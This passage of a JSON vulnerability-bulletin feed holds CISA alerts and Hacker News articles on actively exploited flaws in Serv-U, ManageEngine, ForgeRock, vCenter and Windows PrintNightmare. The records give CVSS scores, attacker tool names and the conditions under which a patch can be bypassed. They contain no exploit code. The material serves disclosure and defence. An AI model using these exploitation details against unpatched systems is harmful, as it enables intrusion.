reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability.\n\nCISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "cisa", "title": "SolarWinds Releases Advisory for Serv-U Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T00:00:00", "id": "CISA:2E658D779271DB98A2BD53EE81F29F3B", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert ](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>)on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. \n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:13:07", "description": "Malicious cyber actors are actively exploiting a pre-authorization remote code execution vulnerability (CVE-2021-35464) in ForgeRock Access Management\u2014a commercial open access management solution that is based on OpenAM, an open-source access management solution. An attacker exploiting this vulnerability can execute commands in the context of the current user. The vulnerability affects Access Management versions 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3 and older unsupported versions.\n\nCISA recommends Access Management users:\n\n * Review the [ForgeRock Security Advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) and the [Australian Cyber Security Centre Alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>);\n * Check for vulnerable instances of the Access Management software (see [ForgeRock\u2019s Technical Impact Assessment](<https://backstage.forgerock.com/cloud-storage-ws/api/v1/cloudstorage/getfile/oEQfKvz8SWSCaq8F2bfwhw>)); and\n * Prioritize deploying an update to Access Management version 7 or apply the workaround urgently.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T00:00:00", "type": "cisa", "title": "Critical ForgeRock Access Management Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-12T00:00:00", "id": "CISA:3A09D1755051967FC65BD11A814E9167", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: \n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", "id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. Additionally, CISA strongly urges organizations ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[![Windows PrintNightmare Vulnerability](https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s728-e1000/windows-patch-update.jpg)](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[![](https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg)](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![](https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg)](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. \"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 